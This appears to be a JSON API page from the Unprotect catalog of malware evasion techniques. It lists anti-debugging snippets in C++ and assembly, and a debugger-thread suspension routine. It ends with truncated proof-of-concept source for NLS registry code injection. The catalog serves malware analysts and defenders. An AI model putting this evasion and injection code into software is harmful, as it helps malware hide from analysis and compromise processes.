HTTP 200 OK
Allow: GET, POST, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept
{
"count": 206,
"next": "https://unprotect.it/api/snippets/?format=api&page=4",
"previous": "https://unprotect.it/api/snippets/?format=api&page=2",
"results": [
{
"id": 110,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 19,
"username": "External",
"email": "null@localhost",
"linkedin": null,
"twitter": null,
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/59/?format=api",
"description": "",
"plain_code": "#include <stdio.h>\r\n#include <windows.h>\r\ntypedef HANDLE (*_CsrGetProcessId)();\r\n\r\nint main(void)\r\n{\r\n HMODULE nt=GetModuleHandle(\"ntdll.dll\");\r\n _CsrGetProcessId CsrGetProcessId=(_CsrGetProcessId)GetProcAddress(nt,\"CsrGetProcessId\");\r\n HANDLE proc = OpenProcess(PROCESS_ALL_ACCESS,FALSE,CsrGetProcessId());\r\n\r\n if(!proc)\r\n {\r\n printf(\"debugger is present!\");\r\n }\r\n}"
},
{
"id": 109,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 19,
"username": "External",
"email": "null@localhost",
"linkedin": null,
"twitter": null,
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/60/?format=api",
"description": "Original source code is available here: https://anti-debug.checkpoint.com/techniques/object-handles.html#closehandle",
"plain_code": "bool Check()\r\n{\r\n __try\r\n {\r\n CloseHandle((HANDLE)0xDEADBEEF);\r\n return false;\r\n }\r\n __except (EXCEPTION_INVALID_HANDLE == GetExceptionCode()\r\n ? EXCEPTION_EXECUTE_HANDLER \r\n : EXCEPTION_CONTINUE_SEARCH)\r\n {\r\n return true;\r\n }\r\n}"
},
{
"id": 108,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 19,
"username": "External",
"email": "null@localhost",
"linkedin": null,
"twitter": null,
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/62/?format=api",
"description": "Original source code available here: https://anti-debug.checkpoint.com/techniques/debug-flags.html#manual-checks-heap-flags",
"plain_code": "bool Check()\r\n{\r\n#ifndef _WIN64\r\n PPEB pPeb = (PPEB)__readfsdword(0x30);\r\n PVOID pHeapBase = !m_bIsWow64\r\n ? (PVOID)(*(PDWORD_PTR)((PBYTE)pPeb + 0x18))\r\n : (PVOID)(*(PDWORD_PTR)((PBYTE)pPeb + 0x1030));\r\n DWORD dwHeapFlagsOffset = IsWindowsVistaOrGreater()\r\n ? 0x40\r\n : 0x0C;\r\n DWORD dwHeapForceFlagsOffset = IsWindowsVistaOrGreater()\r\n ? 0x44 \r\n : 0x10;\r\n#else\r\n PPEB pPeb = (PPEB)__readgsqword(0x60);\r\n PVOID pHeapBase = (PVOID)(*(PDWORD_PTR)((PBYTE)pPeb + 0x30));\r\n DWORD dwHeapFlagsOffset = IsWindowsVistaOrGreater()\r\n ? 0x70 \r\n : 0x14;\r\n DWORD dwHeapForceFlagsOffset = IsWindowsVistaOrGreater()\r\n ? 0x74 \r\n : 0x18;\r\n#endif // _WIN64\r\n\r\n PDWORD pdwHeapFlags = (PDWORD)((PBYTE)pHeapBase + dwHeapFlagsOffset);\r\n PDWORD pdwHeapForceFlags = (PDWORD)((PBYTE)pHeapBase + dwHeapForceFlagsOffset);\r\n return (*pdwHeapFlags & ~HEAP_GROWABLE) || (*pdwHeapForceFlags != 0);\r\n}"
},
{
"id": 107,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 19,
"username": "External",
"email": "null@localhost",
"linkedin": null,
"twitter": null,
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/65/?format=api",
"description": "Original code available here: https://anti-debug.checkpoint.com/techniques/timing.html#kernel-timing",
"plain_code": "bool IsDebugged(DWORD dwNativeElapsed)\r\n{\r\n DWORD dwStart = GetTickCount();\r\n // ... some work\r\n return (GetTickCount() - dwStart) > dwNativeElapsed;\r\n}"
},
{
"id": 106,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 19,
"username": "External",
"email": "null@localhost",
"linkedin": null,
"twitter": null,
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/66/?format=api",
"description": "Original source code available here: https://anti-debug.checkpoint.com/techniques/timing.html#getsystemtime",
"plain_code": "bool IsDebugged(DWORD64 qwNativeElapsed)\r\n{\r\n SYSTEMTIME stStart, stEnd;\r\n FILETIME ftStart, ftEnd;\r\n ULARGE_INTEGER uiStart, uiEnd;\r\n\r\n GetLocalTime(&stStart);\r\n // ... some work\r\n GetLocalTime(&stEnd);\r\n\r\n if (!SystemTimeToFileTime(&stStart, &ftStart))\r\n return false;\r\n if (!SystemTimeToFileTime(&stEnd, &ftEnd))\r\n return false;\r\n\r\n uiStart.LowPart = ftStart.dwLowDateTime;\r\n uiStart.HighPart = ftStart.dwHighDateTime;\r\n uiEnd.LowPart = ftEnd.dwLowDateTime;\r\n uiEnd.HighPart = ftEnd.dwHighDateTime;\r\n return (uiEnd.QuadPart - uiStart.QuadPart) > qwNativeElapsed;\r\n}"
},
{
"id": 105,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 19,
"username": "External",
"email": "null@localhost",
"linkedin": null,
"twitter": null,
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/72/?format=api",
"description": "The below example shows how to calculate the checksum of a function used to detect a breakpoint using INT3. Original source code available here:",
"plain_code": "DWORD CalcFuncCrc(PUCHAR funcBegin, PUCHAR funcEnd)\r\n{\r\n DWORD crc = 0;\r\n for (; funcBegin < funcEnd; ++funcBegin)\r\n {\r\n crc += *funcBegin;\r\n }\r\n return crc;\r\n}\r\n#pragma auto_inline(off)\r\nVOID DebuggeeFunction()\r\n{\r\n int calc = 0;\r\n calc += 2;\r\n calc <<= 8;\r\n calc -= 3;\r\n}\r\nVOID DebuggeeFunctionEnd()\r\n{\r\n};\r\n#pragma auto_inline(on)\r\nDWORD g_origCrc = 0x2bd0;\r\nint main()\r\n{\r\n DWORD crc = CalcFuncCrc((PUCHAR)DebuggeeFunction, (PUCHAR)DebuggeeFunctionEnd);\r\n if (g_origCrc != crc)\r\n {\r\n std::cout << \"Stop debugging program!\" << std::endl;\r\n exit(-1);\r\n }\r\n return 0;\r\n} It was originally published on https://www.apriorit.com/"
},
{
"id": 104,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 19,
"username": "External",
"email": "null@localhost",
"linkedin": null,
"twitter": null,
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/71/?format=api",
"description": "Original source code available here: https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/UnhandledExceptionFilter_Handler.cpp",
"plain_code": "#include \"pch.h\"\r\n#include \"UnhandledExceptionFilter_Handler.h\"\r\n\r\n\r\n/*\r\nWhen an exception occurs, and no registered Exception Handlers exist (neither Structured nor\r\nVectored), or if none of the registered handlers handles the exception, then the kernel32\r\nUnhandledExceptionFilter() function will be called as a last resort. \r\n*/\r\n\r\nBOOL bIsBeinDbg = TRUE;\r\n\r\nLONG WINAPI UnhandledExcepFilter(PEXCEPTION_POINTERS pExcepPointers)\r\n{\r\n\t// If a debugger is present, then this function will not be reached.\r\n\tbIsBeinDbg = FALSE;\r\n return EXCEPTION_CONTINUE_EXECUTION;\r\n}\r\n\r\n\r\nBOOL UnhandledExcepFilterTest ()\r\n{\r\n\tLPTOP_LEVEL_EXCEPTION_FILTER Top = SetUnhandledExceptionFilter(UnhandledExcepFilter);\r\n\tRaiseException(EXCEPTION_FLT_DIVIDE_BY_ZERO, 0, 0, NULL);\r\n\tSetUnhandledExceptionFilter(Top);\r\n\treturn bIsBeinDbg;\r\n}"
},
{
"id": 103,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 19,
"username": "External",
"email": "null@localhost",
"linkedin": null,
"twitter": null,
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/214/?format=api",
"description": "Original source code available here: https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/TrapFlag.cpp",
"plain_code": "#include \"pch.h\"\r\n\r\n#include \"TrapFlag.h\"\r\n\r\n/*\r\n\tThis technique is similar to exceptions based debugger detections.\r\n\tYou enable the trap flag in the current process and check whether\r\n\tan exception is raised or not. If an exception is not raised, you\r\n\tcan assume that a debugger has “swallowed” the exception for us,\r\n\tand that the program is being traced. The beauty of this approach\r\n\tis that it detects every debugger, user mode or kernel mode,\r\n\tbecause they all use the trap flag for tracing a program.\r\n\tVectored Exception Handling is used here because SEH is an\r\n\tanti-debug trick in itself.\r\n*/\r\n\r\nstatic BOOL SwallowedException = TRUE;\r\n\r\nstatic LONG CALLBACK VectoredHandler(\r\n\t_In_ PEXCEPTION_POINTERS ExceptionInfo\r\n)\r\n{\r\n\tSwallowedException = FALSE;\r\n\t\r\n\tif (ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP)\r\n\t\treturn EXCEPTION_CONTINUE_EXECUTION;\r\n\t\t\r\n\treturn EXCEPTION_CONTINUE_SEARCH;\r\n}\r\n\r\n\r\n\r\nBOOL TrapFlag()\r\n{\r\n\tPVOID Handle = AddVectoredExceptionHandler(1, VectoredHandler);\r\n\tSwallowedException = TRUE;\r\n\r\n#ifdef _WIN64\r\n\tUINT64 eflags = __readeflags();\r\n#else\r\n\tUINT eflags = __readeflags();\r\n#endif\r\n\r\n\t// Set the trap flag\r\n\teflags |= 0x100;\r\n\t__writeeflags(eflags);\r\n\r\n\tRemoveVectoredExceptionHandler(Handle);\r\n\treturn SwallowedException;\r\n}"
},
{
"id": 102,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 19,
"username": "External",
"email": "null@localhost",
"linkedin": null,
"twitter": null,
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/212/?format=api",
"description": "Original source code available here: https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/Interrupt_0x2d.cpp",
"plain_code": "#include \"pch.h\"\r\n\r\n#include \"Interrupt_0x2d.h\"\r\n\r\n/*\r\nThe Interrupt_0x2d function will check to see if a debugger is attached to the current process. It does this by setting up\r\nSEH and using the Int 2D instruction which will only cause an exception if there is no debugger. Also when used in OllyDBG\r\nit will skip a byte in the disassembly which could be used to detect the debugger.\r\nVectored Exception Handling is used here because SEH is an anti-debug trick in itself.\r\n*/\r\n\r\nextern \"C\" void __int2d();\r\n\r\nstatic BOOL SwallowedException = TRUE;\r\n\r\nstatic LONG CALLBACK VectoredHandler(\r\n\t_In_ PEXCEPTION_POINTERS ExceptionInfo\r\n)\r\n{\r\n\tSwallowedException = FALSE;\r\n\tif (ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_BREAKPOINT)\r\n\t{\r\n\t\t//The Int 2D instruction already increased EIP/RIP so we don't do that (although it wouldnt hurt).\r\n\t\treturn EXCEPTION_CONTINUE_EXECUTION;\r\n\t}\r\n\treturn EXCEPTION_CONTINUE_SEARCH;\r\n}\r\n\r\nBOOL Interrupt_0x2d()\r\n{\r\n\tPVOID Handle = AddVectoredExceptionHandler(1, VectoredHandler);\r\n\tSwallowedException = TRUE;\r\n\t__int2d();\r\n\tRemoveVectoredExceptionHandler(Handle);\r\n\treturn SwallowedException;\r\n}"
},
{
"id": 101,
"language": {
"id": 5,
"label": "Assembly",
"code_class": "x86asm"
},
"user": {
"id": 19,
"username": "External",
"email": "null@localhost",
"linkedin": null,
"twitter": null,
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/214/?format=api",
"description": "",
"plain_code": "BOOL IsDebuggerPresent_TrapFlag()\r\n{\r\n __try\r\n { \r\n __asm\r\n {\r\n pushfd\r\n or word ptr[esp], 0x100\r\n popfd\r\n nop\r\n }\r\n }\r\n __except(1) \r\n { \r\n return FALSE; \r\n }\r\n return TRUE;\r\n}"
},
{
"id": 100,
"language": {
"id": 5,
"label": "Assembly",
"code_class": "x86asm"
},
"user": {
"id": 19,
"username": "External",
"email": "null@localhost",
"linkedin": null,
"twitter": null,
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/213/?format=api",
"description": "",
"plain_code": "BOOL IsDebuggerPresent_IceBp()\r\n{\r\n __try\r\n { \r\n __asm __emit 0xF1 \r\n }\r\n __except(1) \r\n { \r\n return FALSE; \r\n }\r\n return TRUE;\r\n}"
},
{
"id": 99,
"language": {
"id": 5,
"label": "Assembly",
"code_class": "x86asm"
},
"user": {
"id": 19,
"username": "External",
"email": "null@localhost",
"linkedin": null,
"twitter": null,
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/212/?format=api",
"description": "",
"plain_code": "BOOL IsDebuggerPresent_Int2d()\r\n{\r\n __try\r\n { \r\n __asm int 0x2d \r\n }\r\n __except(1)\r\n {\r\n return FALSE;\r\n }\r\n return TRUE;\r\n}"
},
{
"id": 98,
"language": {
"id": 5,
"label": "Assembly",
"code_class": "x86asm"
},
"user": {
"id": 19,
"username": "External",
"email": "null@localhost",
"linkedin": null,
"twitter": null,
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/74/?format=api",
"description": "",
"plain_code": "BOOL IsDebuggerPresent_Int3()\r\n{\r\n __try\r\n { \r\n __asm int 3 \r\n }\r\n __except(1) \r\n { \r\n return FALSE; \r\n }\r\n return TRUE;\r\n\r\n}"
},
{
"id": 97,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 19,
"username": "External",
"email": "null@localhost",
"linkedin": null,
"twitter": null,
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/74/?format=api",
"description": "Original code available here: https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/SoftwareBreakpoints.cpp",
"plain_code": "#include \"pch.h\"\r\n\r\n#include \"SoftwareBreakpoints.h\"\r\n\r\n\r\n/*\r\nSoftware breakpoints aka INT 3 represented in the IA-32 instruction set with the opcode CC (0xCC).\r\nGiven a memory addresse and size, it is relatively simple to scan for the byte 0xCC -> if(pTmp[i] == 0xCC)\r\nAn obfuscated method would be to check if our memory byte xored with 0x55 is equal 0x99 for example ... \r\n*/\r\n\r\nVOID My_Critical_Function()\r\n{\r\n\tint a = 1;\r\n\tint b = 2;\r\n\tint c = a + b;\r\n\t_tprintf(_T(\"I am critical function, you should protect against int3 bps %d\"), c);\r\n}\r\n\r\n\r\nVOID Myfunction_Adresss_Next()\r\n{\r\n\tMy_Critical_Function();\r\n\t/*\r\n\tThere is no guaranteed way of determining the size of a function at run time(and little reason to do so)\r\n\thowever if you assume that the linker located functions that are adjacent in the source code sequentially in memory,\r\n\tthen the following may give an indication of the size of a function Critical_Function by using :\r\n\tint Critical_Function_length = (int)Myfunction_Adresss_Next - (int)Critical_Function\r\n\tWorks only if you compile the file in Release mode.\r\n\t*/\r\n};\r\n\r\nBOOL SoftwareBreakpoints()\r\n{\r\n\t//NOTE this check might not work on x64 because of alignment 0xCC bytes\r\n\tsize_t sSizeToCheck = (size_t)(Myfunction_Adresss_Next)-(size_t)(My_Critical_Function);\r\n\tPUCHAR Critical_Function = (PUCHAR)My_Critical_Function;\r\n\r\n\tfor (size_t i = 0; i < sSizeToCheck; i++) {\r\n\t\tif (Critical_Function[i] == 0xCC) // Adding another level of indirection : 0xCC xor 0x55 = 0x99\r\n\t\t\treturn TRUE;\r\n\t}\r\n\treturn FALSE;\r\n}"
},
{
"id": 96,
"language": {
"id": 6,
"label": "MASM",
"code_class": "x86asm"
},
"user": {
"id": 19,
"username": "External",
"email": "null@localhost",
"linkedin": null,
"twitter": null,
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/70/?format=api",
"description": "This snippet has been originally published here: http://www.openrce.org/reference_library/anti_reversing_view/8/OllyDbg%20Filename%20Format%20String/",
"plain_code": ".386\r\n .model flat, stdcall\r\n option casemap :none ; case sensitive\r\n\r\n include \\masm32\\include\\windows.inc\r\n include \\masm32\\include\\user32.inc\r\n include \\masm32\\include\\kernel32.inc\r\n\r\n includelib \\masm32\\lib\\user32.lib\r\n includelib \\masm32\\lib\\kernel32.lib\r\n\r\n .data\r\n DbgNotFoundTitle db \"Debugger status:\",0h\r\n DbgFoundTitle db \"Debugger status:\",0h\r\n DbgNotFoundText db \"Debugger not found!\",0h\r\n DbgFoundText db \"Debugger found!\",0h\r\n OriginalFileName db \"%s%s.exe\",0h\r\n .data?\r\n filename db 512 dup(?)\r\n .code\r\n\r\nstart:\r\n\r\n; MASM32 BadStringFormat example\r\n; coded by ap0x\r\n; Reversing Labs: http://ap0x.headcoders.net\r\n\r\n; This example takes advantage of OllyDBG not handleing strings properly.\r\n; Code is based on Piotr Bania`s description.\r\n; How does it work? If we name the file %s%s or any other name that has\r\n; %s%s in it`s name OllyDBG will crash.\r\n; How to use this?\r\n; We just check if the file has been renamed.\r\n\r\nPUSH 512\r\nPUSH offset filename ;%s%s.exe\r\nPUSH 0\r\nCALL GetModuleFileName\r\n\r\nMOV ECX,offset filename\r\nADD ECX,EAX\r\n\r\n @SeekFileName:\r\nDEC ECX\r\nCMP BYTE PTR[ECX],'\\'\r\nJNE @SeekFileName\r\n\r\nMOV BYTE PTR[ECX],0\r\nINC ECX\r\n\r\nPUSH ECX\r\nPUSH offset OriginalFileName ;%s%s.exe\r\nCALL lstrcmp\r\n\r\nTEST EAX,EAX\r\nJNE @DebuggerDetected\r\n\r\nPUSH 40h\r\nPUSH offset DbgNotFoundTitle\r\nPUSH offset DbgNotFoundText\r\nPUSH 0\r\nCALL MessageBox\r\n\r\nJMP @exit\r\n @DebuggerDetected:\r\n\r\nPUSH 30h\r\nPUSH offset DbgFoundTitle\r\nPUSH offset DbgFoundText\r\nPUSH 0\r\nCALL MessageBox\r\n\r\n @exit:\r\n\r\nPUSH 0\r\nCALL ExitProcess\r\n\r\nend start"
},
{
"id": 95,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 19,
"username": "External",
"email": "null@localhost",
"linkedin": null,
"twitter": null,
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/109/?format=api",
"description": "https://anti-debug.checkpoint.com/techniques/interactive.html#suspendthread",
"plain_code": "DWORD g_dwDebuggerProcessId = -1;\r\n\r\nBOOL CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam)\r\n{\r\n DWORD dwProcessId = *(PDWORD)lParam;\r\n\r\n DWORD dwWindowProcessId;\r\n GetWindowThreadProcessId(hwnd, &dwWindowProcessId);\r\n\r\n if (dwProcessId == dwWindowProcessId)\r\n {\r\n std::wstring wsWindowTitle{ string_heper::ToLower(std::wstring(GetWindowTextLengthW(hwnd) + 1, L'\\0')) };\r\n GetWindowTextW(hwnd, &wsWindowTitle[0], wsWindowTitle.size());\r\n\r\n if (string_heper::FindSubstringW(wsWindowTitle, L\"dbg\") || \r\n string_heper::FindSubstringW(wsWindowTitle, L\"debugger\"))\r\n {\r\n g_dwDebuggerProcessId = dwProcessId;\r\n return FALSE;\r\n }\r\n return FALSE;\r\n }\r\n\r\n return TRUE;\r\n}\r\n\r\nbool IsDebuggerProcess(DWORD dwProcessId) const\r\n{\r\n EnumWindows(EnumWindowsProc, reinterpret_cast<LPARAM>(&dwProcessId));\r\n return g_dwDebuggerProcessId == dwProcessId;\r\n}\r\n\r\nbool SuspendDebuggerThread()\r\n{\r\n THREADENTRY32 ThreadEntry = { 0 };\r\n ThreadEntry.dwSize = sizeof(THREADENTRY32);\r\n\r\n DWORD dwParentProcessId = process_helper::GetParentProcessId(GetCurrentProcessId());\r\n if (-1 == dwParentProcessId)\r\n return false;\r\n\r\n HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, dwParentProcessId);\r\n if(Thread32First(hSnapshot, &ThreadEntry))\r\n {\r\n do\r\n {\r\n if ((ThreadEntry.th32OwnerProcessID == dwParentProcessId) && IsDebuggerProcess(dwParentProcessId))\r\n {\r\n HANDLE hThread = OpenThread(THREAD_SUSPEND_RESUME, FALSE, ThreadEntry.th32ThreadID);\r\n if (hThread)\r\n SuspendThread(hThread);\r\n break;\r\n }\r\n } while(Thread32Next(hSnapshot, &ThreadEntry));\r\n }\r\n\r\n if (hSnapshot)\r\n CloseHandle(hSnapshot);\r\n\r\n return false;\r\n}"
},
{
"id": 94,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/208/?format=api",
"description": "The proof of concept (POC) used a position-independent shellcode and injected it into a remote process, which works as a stager for the actual loading of the DLL.\r\n\r\nOriginal source code: https://github.com/NtQuerySystemInformation/NlsCodeInjectionThroughRegistry",
"plain_code": "/* NLSRegistryCodeInjection.cpp */\r\n\r\n#include \"payload.hpp\"\r\n#include \"headers.hpp\"\r\n\r\n//Pending: Make initializer_list cleaner\r\nuint32_t main(void)\r\n{\r\n std::initializer_list<std::wstring> list = { L\"SYSTEM\\\\ControlSet001\\\\Control\\\\Nls\\\\CodePage\", L\"Payload.dll\" , L\"\"};\r\n auto regObj = std::make_unique<RegistryManipulation>(list);\r\n if (OpenKeyForNlsModification(regObj.get()))\r\n {\r\n#ifdef DEBUG\r\n std::printf(\"Key has been modified, now preparing for injection\\n\");\r\n#endif \r\n std::printf(\"Payload executed sucessfully :)\\n\");\r\n system(\"pause\");\r\n }\r\n\r\n return EXIT_SUCCESS;\r\n}\r\n//###########################################################\r\n/* payload.cpp */\r\n\r\n#include \"headers.hpp\"\r\n#include \"payload.hpp\"\r\n#include \"strsafe.h\"\r\n#include \"payload.hpp\"\r\n#include \"resource1.h\"\r\n#define MAX_SIZE_DATA 260\r\n\r\n//IMPLEMENTED IT two different functions for convertion. \r\nUINT StringToIntDecimal(PWCHAR str) noexcept\r\n{\r\n\tuint32_t num = _wtoi(str);\r\n\treturn num;\r\n}\r\nUINT StringToInt(PWCHAR str) noexcept {\r\n\r\n\twchar_t chrSubkey, chr, * j;\r\n\tUINT i;\r\n\tj = str;\r\n\tchrSubkey = *str;\r\n\tfor (i = 0; *j; chrSubkey = *j)\r\n\t{\r\n\t\t++j;\r\n\t\tif ((chrSubkey - 0x41) > 5u)\r\n\t\t{\r\n\t\t\tif ((chrSubkey - 0x30) > 9u)\r\n\t\t\t{\r\n\t\t\t\tif ((chrSubkey - 0x61) > 5u)\r\n\t\t\t\t\treturn i;\r\n\t\t\t\tchr = chrSubkey - 87;\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tchr = chrSubkey - 0x30;\r\n\t\t\t}\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tchr = chrSubkey - 55;\r\n\t\t}\r\n\t\ti = chr + 16 * i;\r\n\t}\r\n\treturn i;\r\n}\r\nBOOLEAN CompareLastElementString(PWCHAR str1, PWCHAR str2, BOOLEAN CaseInsensitive)\r\n{\r\n\tbool bResult = false;\r\n\t//Has to find .dll somewhere, in the substring, otherwise doesnt exist.\r\n\twchar_t* dll = wcsstr(str1, str2);\r\n\tif (dll != nullptr) {\r\n\t\tbResult = true;\r\n\t}\r\n\treturn bResult;\r\n}\r\nbool FindCodePageWithPayload(PRegistryKey regObject, UINT dwValuesCount, UINT dwMaxLenValues){\r\n\tDWORD dwCountName = 0, typeData, ValueDataSize = 0;\r\n\t//uint32_t CodePageInt;\r\n\tWCHAR CodePageID[MAX_PATH], ValueData[MAX_SIZE_DATA];\r\n\tbool bResult = false;\r\n\r\n\tfor (UINT i = 0; i < dwValuesCount; i++) {\r\n\t\tdwCountName = 260; \r\n\t\tValueDataSize = 260;\r\n\t\tLSTATUS status = RegEnumValueW(regObject->hSubkeyNls, i, CodePageID, &dwCountName, nullptr, &typeData, (BYTE*)&ValueData,\r\n\t\t\t&ValueDataSize);\r\n\t\tif (status != ERROR_SUCCESS && GetLastError() != ERROR_ALREADY_EXISTS)\r\n\t\t{\r\n\t\t\tstd::wprintf(L\"Could not query Code Page ID %s, Last error: [%x]\\n\", CodePageID, GetLastError());\r\n\t\t\tcontinue;\r\n\t\t}\r\n#ifdef _DEBUG\r\n\t\tstd::wprintf(L\"Iterating: %d - %s = %s\\n\", i, CodePageID, ValueData);\r\n#endif \r\n\t\tif (typeData == REG_SZ && regObject->compareStringEqual(Index::DLL_NAME, ValueData)){\r\n#ifdef _DEBUG\r\n\t\t\tstd::wprintf(L\"Payload value has been found!: %d - %s = %s\\n\", i, CodePageID, ValueData);\r\n#endif\r\n\t\t\tuint32_t strHex = std::stoull(CodePageID, nullptr, 10);\r\n\t\t\tuint32_t strDecimal = std::stoull(CodePageID, nullptr, 16);\r\n\t\t\tregObject->setCodePageID(strHex, CodePageIDIndex::CodePageInt);\r\n\t\t\tregObject->setCodePageID(strDecimal, CodePageIDIndex::CodePageHex);\r\n\t\t\tstd::wprintf(L\"Values: CodepageHex = %d, CodePageInt = 0x%x\\n\", strDecimal, strHex);\r\n\t\t\tbResult = true;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\treturn bResult;\r\n}\r\n\r\nbool IterateCodePageAndExtractProperId(PRegistryKey regObject) {\r\n\tDWORD dwMaxLenValues, dwCountName = 0, dwValuesCount, typeData, ValueDataSize = 0;\r\n\tuint32_t CodePageInt = NULL, posCount = NULL;\r\n\tbool correctRet = false;\r\n\tLSTATUS status;\r\n\tWCHAR CodePageID[MAX_PATH], ValueData[MAX_SIZE_DATA];\r\n\r\n\t//Queries information for the NLS subkey, mostly related to the values, which is the part that interests us the most.\r\n\tif (::RegQueryInfoKeyW(regObject->hSubkeyNls, nullptr, nullptr, nullptr,\r\n\t\tnullptr, nullptr, nullptr, &dwValuesCount, &dwMaxLenValues, nullptr, nullptr, nullptr))\r\n\t{\r\n\t\tstd::cerr << \"Could not query information for the key, last error is: \" << GetLastError() << \"\\n\";\r\n\t\treturn correctRet;\r\n\t}\r\n\t//Only one failing, lets fix it.\r\n\tif (FindCodePageWithPayload(regObject, dwValuesCount, dwMaxLenValues)){\r\n\t\tcorrectRet = true;\r\n\t\treturn correctRet;\r\n\t}\r\n\t//Find one with .dll, then from there increase one until it works out.\r\n\tfor (UINT i = 0; i < dwValuesCount; i++) {\r\n\t\tdwCountName = 260;\r\n\t\tValueDataSize = 260;\r\n\t\tstatus = RegEnumValueW(regObject->hSubkeyNls, i, CodePageID, &dwCountName, nullptr, &typeData, (BYTE*)&ValueData,\r\n\t\t\t&ValueDataSize);\r\n\t\tif ((status != EXIT_SUCCESS) && (GetLastError() != ERROR_ALREADY_EXISTS))\r\n\t\t{\r\n\t\t\tstd::wprintf(L\"Could not query Code Page ID %s, Last error: [%x]\\n\", CodePageID, status);\r\n\t\t\tcontinue;\r\n\t\t}\r\n#ifdef _DEBUG\r\n\t\tstd::wprintf(L\"Querying value i: %d, %s = %s\\n\", i, CodePageID, ValueData);\r\n#endif\r\n\t\tif (typeData == REG_SZ && CompareLastElementString(ValueData, const_cast<wchar_t*>(L\".dll\"), FALSE))\r\n\t\t{\r\n#ifdef _DEBUG\r\n\t\t\tstd::wprintf(L\"Value with dll found in i = %d, %s = %s\\n\", i, CodePageID, ValueData);\r\n\t\t\t//Convert from str to hex\r\n\t\t\tCodePageInt = StringToInt(CodePageID);\r\n\t\t\tstd::wprintf(L\"Code page as int is: %x\\n\", CodePageInt);\r\n#endif // _DEBUG\r\n\t\t\tCodePageInt = StringToInt(CodePageID);\r\n\t\t\tposCount = i;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tif (CodePageInt == NULL) {\r\n\t\tstd::printf(\"Could not find apropiate dll extension inside one of the subvalues\\n\");\r\n\t\treturn correctRet;\r\n\t}\r\n\t//FIX THIS CODE, WHEN PRINTING THERE IS SOMETHING THAT GOES WRONG.\r\n\tCodePageInt += 1;\r\n\tfor (UINT i = 0; i < dwValuesCount - posCount; i++) {\r\n\t\t//2.Then we proceed to check if the code page ID value exists, if it doesnt, we create it and set the data.\r\n\t\tif (SUCCEEDED(StringCchPrintfW(ValueData, MAX_SIZE_DATA, L\"%04x\", CodePageInt)))\r\n\t\t{\r\n\t\t\tstd::printf(\"Trying to create in CodePage ID %x\\n\", CodePageInt);\r\n\t\t}\r\n\t\tstatus = RegQueryValueEx(regObject->hSubkeyNls, ValueData, NULL, NULL, NULL, NULL);\r\n\t\tif (status != ERROR_SUCCESS && status == ERROR_FILE_NOT_FOUND)\r\n\t\t{\r\n\t\t\tif (!RegSetValueExW(regObject->hSubkeyNls, ValueData, NULL, REG_SZ, (BYTE*)regObject->getStringBuffer(Index::DLL_NAME),\r\n\t\t\t\tregObject->getStringSize(Index::DLL_NAME)))\r\n\t\t\t{\r\n\t\t\t\t//std::wprintf(L\"The string value of the data is: %s\\n\", ValueData);\r\n\t\t\t\tuint32_t CodePageDecimal = StringToIntDecimal(ValueData);\r\n\t\t\t\tstd::printf(\"Sucessfully created dll payload in CodePage ID %x\\n\", CodePageInt);\r\n\t\t\t\tregObject->setCodePageID(CodePageInt, CodePageIDIndex::CodePageHex);\r\n\t\t\t\tregObject->setCodePageID(CodePageDecimal, CodePageIDIndex::CodePageInt);\r\n\t\t\t\tstd::wprintf(L\"Values: CodepageHex = %d, CodePageInt = 0x%x\\n\", CodePageInt, CodePageDecimal);\r\n\t\t\t\tcorrectRet = true;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t\tCodePageInt += 1;\r\n\t}\r\n\treturn correctRet;\r\n}\r\n\r\nbool 